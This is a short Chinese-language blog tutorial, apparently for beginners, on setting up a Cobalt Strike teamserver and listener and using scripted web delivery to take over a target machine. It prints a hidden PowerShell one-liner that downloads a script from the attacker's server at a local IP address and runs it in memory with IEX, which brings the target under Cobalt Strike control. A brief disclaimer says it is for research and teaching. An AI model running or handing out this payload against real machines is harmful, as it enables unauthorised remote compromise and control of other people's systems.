前言
- Cobalt Strike基本学习
一、基础了解CS
启动CS
基本架构是C/S,所以得先启动服务器
然后连接上去
这是界面
kali里面也可以使用命令启动
让目标连接上teamserver
1、设置监听器
2、生成攻击载荷,在钓鱼攻击里面的脚本web传递
①url 它是个文件路径
②就是让目标通过这个地址和端口下载恶意脚本
③目标机子运行
得到payload
1 |
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.0.101:26240/a'))" |
访问:26240/a路径的ip会发现有恶意代码
这份代码就是 powershell运行 加载到内存执行
3、目标机执行payload
接着就上线cs了
二、个人博客
孤桜懶契:http://gylq.gitee.io
FROM:gylq.gitee Author:孤桜懶契
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论